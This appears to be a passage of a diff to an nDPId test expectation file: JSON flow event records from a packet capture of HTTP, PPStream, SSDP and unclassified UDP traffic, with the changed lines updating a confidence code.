-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353144819,"flow_last_seen":1467353144913,"flow_idle_time":7580000,"flow_min_l4_payload_len":229,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":619,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165563,"flow_last_seen":1467353165659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":379,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353144819,"flow_last_seen":1467353144913,"flow_idle_time":7580000,"flow_min_l4_payload_len":229,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":619,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.227.170.88","src_port":22793,"dst_port":20227,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.227.170.88","src_port":22793,"dst_port":20227,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"121.248.133.93","src_port":22793,"dst_port":12757,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"121.248.133.93","src_port":22793,"dst_port":12757,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195852,"flow_last_seen":1467353195956,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195852,"flow_last_seen":1467353195956,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.112.31.89","src_port":22793,"dst_port":29072,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.112.31.89","src_port":22793,"dst_port":29072,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196104,"flow_last_seen":1467353196204,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":1010,"flow_avg_l4_payload_len":505,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196393,"flow_last_seen":1467353196523,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":678,"flow_avg_l4_payload_len":339,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196104,"flow_last_seen":1467353196204,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":1010,"flow_avg_l4_payload_len":505,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196393,"flow_last_seen":1467353196523,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":678,"flow_avg_l4_payload_len":339,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.41.144.153","src_port":22793,"dst_port":10492,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.41.144.153","src_port":22793,"dst_port":10492,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.223.204.67","src_port":22793,"dst_port":11102,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.223.204.67","src_port":22793,"dst_port":11102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353167288,"flow_last_seen":1467353167373,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":785,"flow_avg_l4_payload_len":392,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157433,"flow_last_seen":1467353157718,"flow_idle_time":7580000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":463,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":420,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353170523,"flow_last_seen":1467353171307,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":594,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353190892,"flow_last_seen":1467353190978,"flow_idle_time":7580000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":557,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195855,"flow_last_seen":1467353195998,"flow_idle_time":7580000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196348,"flow_last_seen":1467353199417,"flow_idle_time":7580000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353167288,"flow_last_seen":1467353167373,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":785,"flow_avg_l4_payload_len":392,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157433,"flow_last_seen":1467353157718,"flow_idle_time":7580000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":463,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":420,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353170523,"flow_last_seen":1467353171307,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":594,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353190892,"flow_last_seen":1467353190978,"flow_idle_time":7580000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":557,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195855,"flow_last_seen":1467353195998,"flow_idle_time":7580000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196348,"flow_last_seen":1467353199417,"flow_idle_time":7580000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353136483,"flow_last_seen":1467353136483,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"183.228.182.44","dst_ip":"192.168.115.8","src_port":13913,"dst_port":22793,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353136483,"flow_last_seen":1467353136483,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"183.228.182.44","dst_ip":"192.168.115.8","src_port":13913,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353189820,"flow_last_seen":1467353201861,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":665,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353189820,"flow_last_seen":1467353201861,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":665,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.61.167.104","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.61.167.104","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136836,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.61.167.82","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -542,26 +542,26 @@ 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.61.39.87","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":108,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.61.39.103","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":108,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.61.39.103","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353180830,"flow_last_seen":1467353195837,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353180830,"flow_last_seen":1467353195837,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 